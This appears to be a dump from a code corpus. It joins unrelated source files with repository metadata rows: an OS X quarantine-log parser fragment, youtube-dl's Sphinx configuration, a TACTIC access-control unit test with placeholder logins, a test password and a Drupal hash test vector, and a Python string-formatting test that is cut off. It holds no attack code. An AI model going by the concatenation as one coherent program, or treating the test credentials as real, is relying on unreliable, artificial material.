for input_glob in argv[1:]:
files_to_process += glob.glob(input_glob)
for input_file in files_to_process:
events = OSXQuarantineEvents(open(input_file))
for data in events.Parse():
timestamp, entry_type, url, data1, data2, data3, _, _, _, _, _ = data
try:
date_string = datetime.datetime(1970, 1, 1)
date_string += datetime.timedelta(microseconds=timestamp)
date_string = u"%s+00:00" % (date_string)
except TypeError:
date_string = timestamp
except ValueError:
date_string = timestamp
output_string = u"%s\t%s\t%s\t%s\t%s\t%s" % (
date_string, entry_type, url, data1, data2, data3)
print output_string.encode("UTF-8")
if __name__ == "__main__":
main(sys.argv)
| apache-2.0 | 2,962,586,625,934,899,700 | 30.404762 | 80 | 0.645944 | false |
rbrito/pkg-youtube-dl | docs/conf.py | 39 | 2276 | # coding: utf-8
#
# youtube-dl documentation build configuration file, created by
# sphinx-quickstart on Fri Mar 14 21:05:43 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# Allows to import youtube_dl
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
# -- General configuration ------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'youtube-dl'
copyright = u'2014, Ricardo Garcia Gonzalez'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
from youtube_dl.version import __version__
version = __version__
# The full version, including alpha/beta/rc tags.
release = version
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Output file base name for HTML help builder.
htmlhelp_basename = 'youtube-dldoc'
| unlicense | 6,791,673,059,441,473,000 | 31.056338 | 79 | 0.714411 | false |
Southpaw-TACTIC/TACTIC | src/pyasm/security/security_test.py | 1 | 30165 | #!/usr/bin/env python
###########################################################
#
# Copyright (c) 2005, Southpaw Technology
# All Rights Reserved
#
# PROPRIETARY INFORMATION. This software is proprietary to
# Southpaw Technology, and is not to be reproduced, transmitted,
# or disclosed in any way without written permission.
#
#
#
__all__ = ["SecurityTest"]
import tacticenv
from pyasm.common import Environment, SecurityException, Xml, Config
from pyasm.search import *
from pyasm.unittest import *
from pyasm.biz import Project, ExpressionParser
from pyasm.security import Login
from .security import *
from .drupal_password_hasher import DrupalPasswordHasher
from .access_manager import *
from .batch import *
from .crypto_key import *
import unittest
class SecurityTest(unittest.TestCase):
def _setup(self):
# intialiaze the framework as a batch process
Site.set_site('default')
security = Environment.get_security()
from pyasm.biz import Project
Project.set_project("unittest")
self.security = Environment.get_security()
self.user = 'unittest_guy'
self.password = 'cow'
self.encrypted = Login.encrypt_password(self.password)
self.person = None
# start a transaction
self.transaction = Transaction.get(create=True)
#self.transaction.start()
# IF Portal
portal_enabled = Config.get_value("portal", "enabled") == "true"
if portal_enabled:
try:
site = Site.set_site("default")
# create the user
login = SObjectFactory.create("portal/client")
login.set_value("login", self.user)
login.set_value("password", self.encrypted)
login.commit()
finally:
Site.pop_site()
# create the user
login = SObjectFactory.create("sthpw/login")
login.set_value("login", self.user)
login.set_value("password", self.encrypted)
login.set_value("login_groups", "test")
login.commit()
s = Search('sthpw/login_group')
s.add_filter('login_group','user')
group = s.get_sobject()
if not group:
group = SObjectFactory.create("sthpw/login_group")
group.set_value("login_group", 'user')
group.set_value('access_level','min')
group.commit()
s = Search('sthpw/login_in_group')
s.add_filter('login',self.user)
s.add_filter('login_group', 'user')
lng = s.get_sobject()
if lng:
lng.delete()
# create the user2
login = SObjectFactory.create("sthpw/login")
login.set_value("login", 'unittest_gal')
login.set_value("password", self.encrypted)
login.set_value("login_groups", "test")
login.commit()
# create the user3 and add to a group
login = SObjectFactory.create("sthpw/login")
login.set_value("login", 'unittest_dan')
login.set_value("password", self.encrypted)
login.commit()
login = SObjectFactory.create("sthpw/login_group")
login.set_value("login_group", 'unittest_med')
login.commit()
login = SObjectFactory.create("sthpw/login_group")
login.set_value("login_group", 'test')
login.commit()
l_in_g = SObjectFactory.create("sthpw/login_in_group")
l_in_g.set_value("login", 'unittest_dan')
l_in_g.set_value("login_group", 'unittest_med')
l_in_g.commit()
l_in_g = SObjectFactory.create("sthpw/login_in_group")
l_in_g.set_value("login", self.user)
l_in_g.set_value("login_group", 'test')
l_in_g.commit()
def _tear_down(self):
#self.transaction = Transaction.get()
self.transaction.rollback()
# this is necessary cuz the set_value() was caught in a security exception possibly, needs investigation
#if self.person:
# self.person.delete()
tasks = Search.eval("@SOBJECT(sthpw/task['project_code','in','unittest|sample3d'])")
for task in tasks:
task.delete(triggers=False)
def test_all(self):
batch = Batch()
Environment.get_security().set_admin(True)
from pyasm.unittest import UnittestEnvironment, Sample3dEnvironment
test_env = UnittestEnvironment()
test_env.create()
sample3d_env = Sample3dEnvironment(project_code='sample3d')
sample3d_env.create()
Project.set_project("unittest")
try:
self.access_manager = Environment.get_security().get_access_manager()
self._test_all()
finally:
# Reset access manager for tear down
Environment.get_security()._access_manager = self.access_manager
Environment.get_security().reset_access_manager()
self._tear_down()
Environment.get_security().set_admin(True)
test_env.delete()
Environment.get_security().set_admin(True)
sample3d_env.delete()
Site.pop_site()
def _test_initial_access_level(self):
# before adding process unittest_guy in user group is in MIN access_level
# so no access to process, but access to search_types
self.security.set_admin(False)
security = Environment.get_security()
process_keys = [{'process': 'anim'}]
proc_access = security.check_access("process", process_keys, "allow")
self.assertEqual(proc_access, False)
stype_keys = [{'code':'*'}, {'code':'unittest/city'}]
stype_access = security.check_access("search_type", stype_keys, "allow")
a = security.get_access_manager()
self.assertEqual(stype_access, True)
# we don't have this sType specified explicitly, should be False
stype_keys = [{'code':'unittest/city'}]
stype_access = security.check_access("search_type", stype_keys, "allow")
a = security.get_access_manager()
self.assertEqual(stype_access, False)
def _test_all(self):
try:
self._setup()
self._test_crypto()
self._test_drupal()
self._test_security_fail()
self._test_security_pass()
self._test_initial_access_level()
self._test_sobject_access_manager()
# order matters here
self._test_search_filter()
self._test_access_level()
self._test_access_manager()
self._test_guest_allow()
except Exception as e:
print("Error: ", e)
raise
def _test_drupal(self):
password = "tactic"
salt = "DPRNKWLY"
new = DrupalPasswordHasher().encode(password, salt, 'D')
encoded = "$S$DDPRNKWLY5IwB.aQlCm/OLRrFxZmpa7Rk/kjm/J45bGNGTXUsRxq"
self.assertEqual(new, encoded)
verify = DrupalPasswordHasher().verify("tactic", encoded)
self.assertEqual(True, verify)
def _test_security_fail(self):
# should fail
password = 'test'
fail = False
try:
self.security.login_user(self.user,password)
except SecurityException as e:
fail = True
self.assertEqual( True, fail )
def _test_security_pass(self):
fail = False
try:
self.security.login_user(self.user,self.password)
except SecurityException as e:
fail = True
user = Environment.get_user_name()
# set this user as admin
self.security.set_admin(True)
self.assertEqual('unittest_guy', user)
self.assertEqual( False, fail )
def count(self, it):
from collections import defaultdict
d = defaultdict(int)
for j in it:
d[j] += 1
return d
def _test_search_filter(self):
# NOTE: this unittest is flawed because it relies on project
# that may not exist
self.security.set_admin(False)
# exclude sample3d tasks and include unittest tasks only
rules = """
<rules>
<rule value='sample3d' search_type='sthpw/task' column='project_code' op='!=' group='search_filter'/>
<rule value='unittest' search_type='sthpw/task' column='project_code' group='search_filter'/>
</rules>
"""
xml = Xml()
xml.read_string(rules)
access_manager = Environment.get_security().get_access_manager()
access_manager.add_xml_rules(xml)
search = Search('sthpw/task')
tasks = search.get_sobjects()
project_codes = SObject.get_values(tasks,'project_code', unique=True)
self.assertEqual(False, 'sample3d' in project_codes)
self.assertEqual(True, 'unittest' in project_codes)
# test list-based expression
rules = """
<rules>
<rule value='$PROJECT' search_type='sthpw/task' column='project_code' group='search_filter'/>
<rule value="@GET(sthpw/login['login','EQ','unittest'].login)" search_type='sthpw/task' op='in' column='assigned' group='search_filter' project='*'/>
</rules>
"""
xml = Xml()
xml.read_string(rules)
# reset it
Environment.get_security().reset_access_manager()
self.security.set_admin(False)
access_manager = Environment.get_security().get_access_manager()
access_manager.add_xml_rules(xml)
search = Search('sthpw/task')
tasks = search.get_sobjects()
# 3 tasks were created above for a person
self.assertEqual(3, len(tasks))
assigned_codes = SObject.get_values(tasks,'assigned', unique=True)
project_codes = SObject.get_values(tasks,'project_code', unique=True)
self.assertEqual({'unittest_guy': 1,'unittest_gal': 1}, self.count(assigned_codes))
self.assertEqual(True, ['unittest'] == project_codes)
rules = """
<rules>
<rule group="project" code='sample3d' access='allow'/>
<rule group="project" code='unittest' access='allow'/>
<rule group="project" code='art' access='allow'/>
<rule value='$PROJECT' search_type='sthpw/task' column='project_code' group='search_filter'/>
<rule value='@GET(login.login)' search_type='sthpw/task' column='assigned' group='search_filter' project='*'/>
</rules>
"""
xml = Xml()
xml.read_string(rules)
# reset it
security = Environment.get_security()
security.reset_access_manager()
access_manager = security.get_access_manager()
access_manager.add_xml_rules(xml)
search = Search('sthpw/task')
tasks = search.get_sobjects()
# 2 tasks were created above for unittest_guy
self.assertEqual(2, len(tasks))
assigned_codes = SObject.get_values(tasks,'assigned', unique=True)
project_codes = SObject.get_values(tasks,'project_code', unique=True)
self.assertEqual(True, ['unittest_guy'] == assigned_codes)
self.assertEqual(True, ['unittest'] == project_codes)
Project.set_project('sample3d')
try:
search = Search('sthpw/task')
tasks = search.get_sobjects()
self.assertEqual(1, len(tasks))
assigned_codes = SObject.get_values(tasks,'assigned', unique=True)
project_codes = SObject.get_values(tasks,'project_code', unique=True)
self.assertEqual(True, ['unittest_guy'] == assigned_codes)
self.assertEqual(True, ['sample3d'] == project_codes)
finally:
Project.set_project('unittest')
# project specific rule
proj_rules = """
<rules>
<rule group="project" code='sample3d' access='allow'/>
<rule group="project" code='unittest' access='allow'/>
<rule value='$PROJECT' search_type='sthpw/task' column='project_code' group='search_filter'/>
<rule value='@GET(login.login)' search_type='sthpw/task' column='assigned' group='search_filter' project='unittest'/>
<rule group="process" process="anim" access="allow"/>
<rule group="process" process="comp" access="allow"/>
</rules>
"""
xml = Xml()
xml.read_string(proj_rules)
# reset it
Environment.get_security().reset_access_manager()
access_manager = Environment.get_security().get_access_manager()
access_manager.add_xml_rules(xml)
project = Project.get_by_code('sample3d')
if project:
Project.set_project('sample3d')
search = Search('sthpw/task')
tasks = search.get_sobjects()
assigned_codes = SObject.get_values(tasks,'assigned', unique=True)
project_codes = SObject.get_values(tasks,'project_code', unique=True)
# should fail since project is switched to sample3d.. and it should have more than just unittest
self.assertEqual(False, ['unittest'] == assigned_codes)
self.assertEqual(True, ['sample3d'] == project_codes)
# unittest specific rule that uses negation !=, this takes care of NULL value automatically
rules = """
<rules>
<rule group="project" code='sample3d' access='allow'/>
<rule value='5' search_type='sthpw/task' column='priority' op='!=' group='search_filter' project='sample3d'/>
<rule group="process" process="anim" access="allow"/>
<rule group="process" process="comp" access="allow"/>
</rules>
"""
xml = Xml()
xml.read_string(rules)
# reset it
Environment.get_security().reset_access_manager()
access_manager = Environment.get_security().get_access_manager()
access_manager.add_xml_rules(xml)
Project.set_project('sample3d')
search = Search('sthpw/task')
tasks = search.get_sobjects()
priorities = SObject.get_values(tasks,'priority', unique=True)
#project_codes = SObject.get_values(tasks,'project_code', unique=True)
for p in priorities:
self.assertEqual(True, p != 5)
try:
Project.set_project('unittest')
except SecurityException as e:
# should get an SecurityException
self.assertEqual('User [unittest_guy] is not permitted to view project [unittest]', e.__str__())
xml = Xml()
xml.read_string(proj_rules)
# reset it
Environment.get_security().reset_access_manager()
access_manager = Environment.get_security().get_access_manager()
access_manager.add_xml_rules(xml)
except Exception as e:
print("Error : %s", str(e))
else:
# this should not happen
raise Exception('unittest_guy should not be allowed to use Project unittest here.')
# One should be able to insert a task that is outside the query restriction of the above rule
task = SearchType.create('sthpw/task')
task.set_sobject_value(self.person)
task.set_value('assigned', 'made_up_login')
task.set_value('project_code', 'sample3d')
task.set_value('description', 'a new task')
task.set_value('process', 'unittest')
task.set_value('context', 'unittest')
task.commit()
self.assertEqual('made_up_login', task.get_value('assigned'))
# DEPRECATED: column level security has been disabled for now (for
# performance reasons)
def _test_sobject_access_manager(self):
'''test a more realistic example'''
# create a test person
person = Person.create("Donald", "Duck", "DisneyLand", "A duck!!!")
self.person = person
for project_code in ['unittest','unittest','sample3d']:
task = SearchType.create('sthpw/task')
task.set_sobject_value(person)
task.set_value('assigned', 'unittest_guy')
task.set_value('project_code', project_code)
task.set_value('description', 'do something good')
task.set_value('process', 'unittest')
task.set_value('context', 'unittest')
task.commit()
# an extra task for list-based search_filter test
task = SearchType.create('sthpw/task')
task.set_sobject_value(person)
task.set_value('assigned', 'unittest_gal')
task.set_value('project_code', 'unittest')
task.set_value('description', 'do something good')
task.set_value('process', 'unittest2')
task.set_value('context', 'unittest2')
task.commit()
# add these rules to the current user
rules = """
<rules>
<rule group="sobject_column" default="edit"/>
<rule group="sobject_column" search_type="unittest/person" column="name_first" access="edit"/>
<rule group="sobject_column" search_type="unittest/person" column="name_last" access="deny"/>
<rule group="sobject_column" search_type="unittest/person" column="nationality" access="deny"/>
</rules>
"""
xml = Xml()
xml.read_string(rules)
access_manager = Environment.get_security().get_access_manager()
access_manager.add_xml_rules(xml)
# disable admin for this test
access_manager.set_admin(False)
# should succeed
person.set_value("name_first", "Donny")
# should fail
try:
person.set_value("name_last", "Ducky")
except SecurityException as e:
pass
else:
self.fail("Expected a SecurityException")
# should succeed
name_last = person.get_value("name_last")
self.assertEqual("Duck", name_last)
# should fail
# DISABLED for now since Search._check_value_security() is commented out
"""
try:
nationality = person.get_value("nationality")
except SecurityException as e:
pass
else:
self.fail("Expected a SecurityException")
"""
# disable admin for this test
access_manager.set_admin(True)
def _test_access_manager(self):
# reset it
Environment.get_security().reset_access_manager()
access_manager = Environment.get_security().get_access_manager()
xml = Xml()
xml.read_string('''
<rules>
<rule group='sobject' key='corporate/budget' access='allow'/>
<rule group='sobject' key='corporate/salary' access='allow'/>
<rule group='sobject' key='prod/asset' access='edit'/>
<rule group='sobject' search_type='sthpw/note' project='sample3d' access='edit'/>
<group type='url' default='deny'>
<rule key='/tactic/bar/Partner' access='view'/>
<rule key='/tactic/bar/External' access='view'/>
</group>
<rule group='sobject' search_type='prod/layer' project='sample3d' access='view'/>
<rule column='description' search_type='prod/shot' access='view' group='sobject_column'/>
<group type='sobject_column' default='edit'>
<rule key='prod/asset|director_notes' access='deny'/>
<rule key='prod/asset|sensitive_data' access='deny'/>
</group>
<rule group='search_type' code='prod/asset' access='allow'/>
<rule group='search_type' code='sthpw/note' project='unittest' access='edit'/>
<rule group='search_type' code='unittest/person' project='unittest' access='allow'/>
<rule group='builtin' key='view_site_admin' access='allow'/>
<rule group='builtin' key='export_all_csv' project='unittest' access='allow'/>
<rule group='builtin' key='import_csv' access='allow'/>
<rule group='builtin' key='retire_delete' project='*' access='allow'/>
<rule group='builtin' key='view_side_bar' access='allow'/>
</rules>
''')
access_manager.add_xml_rules(xml)
# try mixing in a 2nd login_group rule with a project override, mimmicking a
# login_group with project_code. but project group is special it doesn't get the usual
# project_override treatment
xml2 = Xml()
xml2.read_string('''
<rules>
<rule group="project" code="sample3d" access="allow"/>
<rule group="project" code="unittest" access="allow"/>
<rule group='builtin' key='view_side_bar' project='sample3d' access='allow'/>
</rules>
''')
access_manager.add_xml_rules(xml2)
access_manager.print_rules('project')
test = access_manager.check_access('builtin', 'view_site_admin','allow')
self.assertEqual(test, True)
Project.set_project('sample3d')
test = access_manager.check_access('builtin', 'export_all_csv','allow')
self.assertEqual(test, False)
# old way of checking project
test = access_manager.check_access('project', 'sample3d','allow')
self.assertEqual(test, True)
Project.set_project('unittest')
# old way should work as well
test = access_manager.check_access('builtin', 'export_all_csv','allow')
self.assertEqual(test, True)
# default to the system's hardcoded deny for builtin
test = access_manager.check_access('builtin', 'export_all_csv','allow', default='deny')
self.assertEqual(test, True)
# this is the new way to control per project csv export
keys = [{'key':'export_all_csv', 'project': 'unittest'}, {'key':'export_all_csv','project': '*'}]
test = access_manager.check_access('builtin', keys ,'allow')
self.assertEqual(test, True)
keys = [{'key':'import_csv', 'project': '*'}, {'key':'import_csv','project': Project.get_project_code()}]
test = access_manager.check_access('builtin', keys ,'allow')
self.assertEqual(test, True)
test = access_manager.check_access('builtin', 'view_side_bar','allow')
self.assertEqual(test, True)
key = { "project": 'unittest', 'key':'view_side_bar' }
key1 = { "project": 'sample3d', 'key':'view_side_bar' }
key2 = { "project": "*",'key': 'view_side_bar' }
keys = [key, key2]
test = access_manager.check_access('builtin', keys,'allow')
self.assertEqual(test, True)
keys = [key1, key2]
test = access_manager.check_access('builtin', keys,'allow')
self.assertEqual(test, True)
test = access_manager.check_access('builtin', 'retire_delete','allow')
self.assertEqual(test, True)
# test sensitive sobject
test = access_manager.get_access('sobject', 'corporate/budget')
self.assertEqual(test, "allow")
# test allowed sobject
test = access_manager.get_access('sobject', 'prod/asset')
self.assertEqual(test, "edit")
test = access_manager.get_access('sobject', [{'search_type':'sthpw/note', 'project':'sample3d'}])
self.assertEqual(test, "edit")
# test url
test = access_manager.get_access('url', '/tactic/bar/Partner')
self.assertEqual(test, "view")
# test with access values ... a more typical usage
test = access_manager.check_access('sobject','prod/asset','view')
self.assertEqual(test, True)
test = access_manager.check_access('sobject','corporate/budget','edit')
self.assertEqual(test, True)
test = access_manager.check_access('sobject_column', 'prod/asset|director_notes','deny')
self.assertEqual(test, True)
test = access_manager.check_access('sobject_column',{'search_type':'prod/shot','column':'description'},'edit')
self.assertEqual(test, False)
test = access_manager.check_access('sobject_column',{'search_type':'prod/shot','column':'description'},'view')
self.assertEqual(test, True)
test = access_manager.get_access('sobject', {'search_type':'sthpw/note', 'project':'sample3d'} )
self.assertEqual(test, "edit")
test = access_manager.get_access('sobject', {'search_type':'sthpw/note'} )
self.assertEqual(test, None)
test = access_manager.get_access('sobject', {'search_type':'prod/layer', 'project':'sample3d'} )
self.assertEqual(test, "view")
test = access_manager.get_access('sobject', 'prod/layer' )
self.assertEqual(test, None)
Project.set_project('sample3d')
# security version 2 uses group = search_type
asset = SearchType.create('prod/asset')
asset.set_value('name','unit test obj')
asset.commit(triggers=False)
# replace the access manager with this
Environment.get_security()._access_manager = access_manager
test = access_manager.check_access('search_type',{'search_type':'prod/asset','project':'sample3d'},'delete')
self.assertEqual(test, False)
asset.delete()
note = SearchType.create('sthpw/note')
note.set_value('note','unit test note obj')
note.set_value('project_code','unittest')
note.commit(triggers=False)
test = access_manager.get_access('search_type', [{'code':'sthpw/note', 'project':'unittest'}] )
self.assertEqual(test, 'edit')
msg = ''
# delete of unittest note should fail
try:
note.delete()
except SObjectException as e:
msg = 'delete error'
self.assertEqual(msg, 'delete error')
note = SearchType.create('sthpw/note')
note.set_value('note','unit test sample3d note obj')
note.set_value('project_code','sample3d')
note.commit(triggers=False)
# this should pass since it's a sthpw/ prefix
note.delete()
test = access_manager.check_access('search_type',{'search_type':'sthpw/note','project':'unittest'},'delete')
self.assertEqual(test, False)
self.assertEqual('unittest_guy', Environment.get_user_name())
def _test_crypto(self):
key = CryptoKey()
key.generate()
# test verifying a string
test_string = "Holy Moly"
signature = key.get_signature(test_string)
check = key.verify(test_string, signature)
self.assertEqual(True, check)
# verify an incorrect string
check = key.verify("whatever", signature)
self.assertEqual(False, check)
# encrypt and decrypt a string
test_string = "This is crazy"
coded = key.encrypt(test_string)
# create a new key
private_key = key.get_private_key()
key2 = CryptoKey()
key2.set_private_key(private_key)
test_string2 = key2.decrypt(coded)
self.assertEqual(test_string, test_string2)
def _test_access_level(self):
security = Environment.get_security()
from pyasm.security import get_security_version
security_version = get_security_version()
projects = Search.eval('@SOBJECT(sthpw/project)')
if security_version >= 2:
for project in projects:
key = { "code": project.get_code() }
key2 = { "code": "*" }
keys = [key, key2]
default = "deny"
# other than sample3d, unittest as allowed above, a default low access level user
# should not see other projects
access = security.check_access("project", keys, "allow", default=default)
process_keys = [{'process': 'anim'}]
proc_access = security.check_access("process", process_keys, "allow")
self.assertEqual(proc_access, True)
if project.get_code() in ['sample3d','unittest']:
self.assertEqual(access, True)
else:
self.assertEqual(access, False)
else:
raise SecurityException('Please test with security version 2. Set it in your config file')
def _test_guest_allow(self):
'''test Config tag allow_guest in security tag.
Note: Since it is hard to emulate AppServer class,
this is based on logic which handles in _get_display
of BaseAppServer.
1. If allow_guest is false, then it is necessary that
Sudo is instantiated.
2. If allow_guest is true, then it is necessary that
guest login rules are added and login_as_guest is
executed.
'''
security = Security()
Environment.set_security(security)
#1. allow_guest is false
fail = False
try:
sudo = Sudo()
except Exception as e:
fail = True
self.assertEqual( False, fail )
sudo.exit()
key = [{'code': "*"}]
project_access = security.check_access("project", key, "allow")
self.assertEqual(project_access, False)
#2. allow_guest is true
Site.set_site("default")
try:
security.login_as_guest()
ticket_key = security.get_ticket_key()
access_manager = security.get_access_manager()
xml = Xml()
xml.read_string('''
<rules>
<rule column="login" value="{$LOGIN}" search_type="sthpw/login" access="deny" op="!=" group="search_filter"/>
<rule group="project" code="default" access="allow"/>
</rules>
''')
access_manager.add_xml_rules(xml)
finally:
Site.pop_site()
default_key = [{'code': "default"}]
project_access = security.check_access("project", default_key, "allow")
self.assertEqual(project_access, True)
unittest_key = [{'code', "sample3d"}]
project_access = security.check_access("project", unittest_key, "allow")
self.assertEqual(project_access, False)
if __name__ == "__main__":
unittest.main()
| epl-1.0 | -1,314,311,670,555,871,200 | 34.698225 | 157 | 0.592408 | false |
xbmc/atv2 | xbmc/lib/libPython/Python/Lib/test/test_format.py | 8 | 10198 | from test.test_support import verbose, have_unicode, TestFailed
import sys
# test string formatting operator (I am not sure if this is being tested
# elsewhere but, surely, some of the given cases are *not* tested because
# they crash python)
# test on unicode strings as well
overflowok = 1
def testformat(formatstr, args, output=None):
if verbose:
if output:
print "%s %% %s =? %s ..." %\
(repr(formatstr), repr(args), repr(output)),
else:
print "%s %% %s works? ..." % (repr(formatstr), repr(args)),
try:
result = formatstr % args
except OverflowError:
if not overflowok:
raise
if verbose:
print 'overflow (this is fine)'
else:
if output and result != output:
if verbose:
print 'no'
print "%s %% %s == %s != %s" %\
(repr(formatstr), repr(args), repr(result), repr(output))
else:
if verbose:
print 'yes'
def testboth(formatstr, *args):
testformat(formatstr, *args)
if have_unicode:
testformat(unicode(formatstr), *args)
testboth("%.1d", (1,), "1")
testboth("%.*d", (sys.maxint,1)) # expect overflow
testboth("%.100d", (1,), '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001')
testboth("%#.117x", (1,), '0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001')
testboth("%#.118x", (1,), '0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001')
testboth("%f", (1.0,), "1.000000")
# these are trying to test the limits of the internal magic-number-length
# formatting buffer, if that number changes then these tests are less
# effective
testboth("%#.*g", (109, -1.e+49/3.))
testboth("%#.*g", (110, -1.e+49/3.))
testboth("%#.*g", (110, -1.e+100/3.))
# test some ridiculously large precision, expect overflow
testboth('%12.*f', (123456, 1.0))
# Formatting of long integers. Overflow is not ok
overflowok = 0
testboth("%x", 10L, "a")
testboth("%x", 100000000000L, "174876e800")
testboth("%o", 10L, "12")
testboth("%o", 100000000000L, "1351035564000")
testboth("%d", 10L, "10")
testboth("%d", 100000000000L, "100000000000")
big = 123456789012345678901234567890L
testboth("%d", big, "123456789012345678901234567890")
testboth("%d", -big, "-123456789012345678901234567890")
testboth("%5d", -big, "-123456789012345678901234567890")
testboth("%31d", -big, "-123456789012345678901234567890")
testboth("%32d", -big, " -123456789012345678901234567890")
testboth("%-32d", -big, "-123456789012345678901234567890 ")
testboth("%032d", -big, "-0123456789012345678901234567890")
testboth("%-032d", -big, "-123456789012345678901234567890 ")
testboth("%034d", -big, "-000123456789012345678901234567890")
testboth("%034d", big, "0000123456789012345678901234567890")
testboth("%0+34d", big, "+000123456789012345678901234567890")
testboth("%+34d", big, " +123456789012345678901234567890")
testboth("%34d", big, " 123456789012345678901234567890")
testboth("%.2d", big, "123456789012345678901234567890")
testboth("%.30d", big, "123456789012345678901234567890")
testboth("%.31d", big, "0123456789012345678901234567890")
testboth("%32.31d", big, " 0123456789012345678901234567890")
big = 0x1234567890abcdef12345L # 21 hex digits
testboth("%x", big, "1234567890abcdef12345")
testboth("%x", -big, "-1234567890abcdef12345")
testboth("%5x", -big, "-1234567890abcdef12345")
testboth("%22x", -big, "-1234567890abcdef12345")
testboth("%23x", -big, " -1234567890abcdef12345")
testboth("%-23x", -big, "-1234567890abcdef12345 ")
testboth("%023x", -big, "-01234567890abcdef12345")
testboth("%-023x", -big, "-1234567890abcdef12345 ")
testboth("%025x", -big, "-0001234567890abcdef12345")
testboth("%025x", big, "00001234567890abcdef12345")
testboth("%0+25x", big, "+0001234567890abcdef12345")
testboth("%+25x", big, " +1234567890abcdef12345")
testboth("%25x", big, " 1234567890abcdef12345")
testboth("%.2x", big, "1234567890abcdef12345")
testboth("%.21x", big, "1234567890abcdef12345")
testboth("%.22x", big, "01234567890abcdef12345")
testboth("%23.22x", big, " 01234567890abcdef12345")
testboth("%-23.22x", big, "01234567890abcdef12345 ")
testboth("%X", big, "1234567890ABCDEF12345")
testboth("%#X", big, "0X1234567890ABCDEF12345")
testboth("%#x", big, "0x1234567890abcdef12345")
testboth("%#x", -big, "-0x1234567890abcdef12345")
testboth("%#.23x", -big, "-0x001234567890abcdef12345")
testboth("%#+.23x", big, "+0x001234567890abcdef12345")
testboth("%# .23x", big, " 0x001234567890abcdef12345")
testboth("%#+.23X", big, "+0X001234567890ABCDEF12345")
testboth("%#-+.23X", big, "+0X001234567890ABCDEF12345")
testboth("%#-+26.23X", big, "+0X001234567890ABCDEF12345")
testboth("%#-+27.23X", big, "+0X001234567890ABCDEF12345 ")
testboth("%#+27.23X", big, " +0X001234567890ABCDEF12345")
# next one gets two leading zeroes from precision, and another from the
# 0 flag and the width
testboth("%#+027.23X", big, "+0X0001234567890ABCDEF12345")
# same, except no 0 flag
testboth("%#+27.23X", big, " +0X001234567890ABCDEF12345")
big = 012345670123456701234567012345670L # 32 octal digits
testboth("%o", big, "12345670123456701234567012345670")
testboth("%o", -big, "-12345670123456701234567012345670")
testboth("%5o", -big, "-12345670123456701234567012345670")
testboth("%33o", -big, "-12345670123456701234567012345670")
testboth("%34o", -big, " -12345670123456701234567012345670")
testboth("%-34o", -big, "-12345670123456701234567012345670 ")
testboth("%034o", -big, "-012345670123456701234567012345670")
testboth("%-034o", -big, "-12345670123456701234567012345670 ")
testboth("%036o", -big, "-00012345670123456701234567012345670")
testboth("%036o", big, "000012345670123456701234567012345670")
testboth("%0+36o", big, "+00012345670123456701234567012345670")
testboth("%+36o", big, " +12345670123456701234567012345670")
testboth("%36o", big, " 12345670123456701234567012345670")
testboth("%.2o", big, "12345670123456701234567012345670")
testboth("%.32o", big, "12345670123456701234567012345670")
testboth("%.33o", big, "012345670123456701234567012345670")
testboth("%34.33o", big, " 012345670123456701234567012345670")
testboth("%-34.33o", big, "012345670123456701234567012345670 ")
testboth("%o", big, "12345670123456701234567012345670")
testboth("%#o", big, "012345670123456701234567012345670")
testboth("%#o", -big, "-012345670123456701234567012345670")
testboth("%#.34o", -big, "-0012345670123456701234567012345670")
testboth("%#+.34o", big, "+0012345670123456701234567012345670")
testboth("%# .34o", big, " 0012345670123456701234567012345670")
testboth("%#+.34o", big, "+0012345670123456701234567012345670")
testboth("%#-+.34o", big, "+0012345670123456701234567012345670")
testboth("%#-+37.34o", big, "+0012345670123456701234567012345670 ")
testboth("%#+37.34o", big, " +0012345670123456701234567012345670")
# next one gets one leading zero from precision
testboth("%.33o", big, "012345670123456701234567012345670")
# base marker shouldn't change that, since "0" is redundant
testboth("%#.33o", big, "012345670123456701234567012345670")
# but reduce precision, and base marker should add a zero
testboth("%#.32o", big, "012345670123456701234567012345670")
# one leading zero from precision, and another from "0" flag & width
testboth("%034.33o", big, "0012345670123456701234567012345670")
# base marker shouldn't change that
testboth("%0#34.33o", big, "0012345670123456701234567012345670")
# Some small ints, in both Python int and long flavors).
testboth("%d", 42, "42")
testboth("%d", -42, "-42")
testboth("%d", 42L, "42")
testboth("%d", -42L, "-42")
testboth("%#x", 1, "0x1")
testboth("%#x", 1L, "0x1")
testboth("%#X", 1, "0X1")
testboth("%#X", 1L, "0X1")
testboth("%#o", 1, "01")
testboth("%#o", 1L, "01")
testboth("%#o", 0, "0")
testboth("%#o", 0L, "0")
testboth("%o", 0, "0")
testboth("%o", 0L, "0")
testboth("%d", 0, "0")
testboth("%d", 0L, "0")
testboth("%#x", 0, "0x0")
testboth("%#x", 0L, "0x0")
testboth("%#X", 0, "0X0")
testboth("%#X", 0L, "0X0")
testboth("%x", 0x42, "42")
testboth("%x", -0x42, "-42")
testboth("%x", 0x42L, "42")
testboth("%x", -0x42L, "-42")
testboth("%o", 042, "42")
testboth("%o", -042, "-42")
testboth("%o", 042L, "42")
testboth("%o", -042L, "-42")
# Test exception for unknown format characters
if verbose:
print 'Testing exceptions'
def test_exc(formatstr, args, exception, excmsg):
try:
testformat(formatstr, args)
except exception, exc:
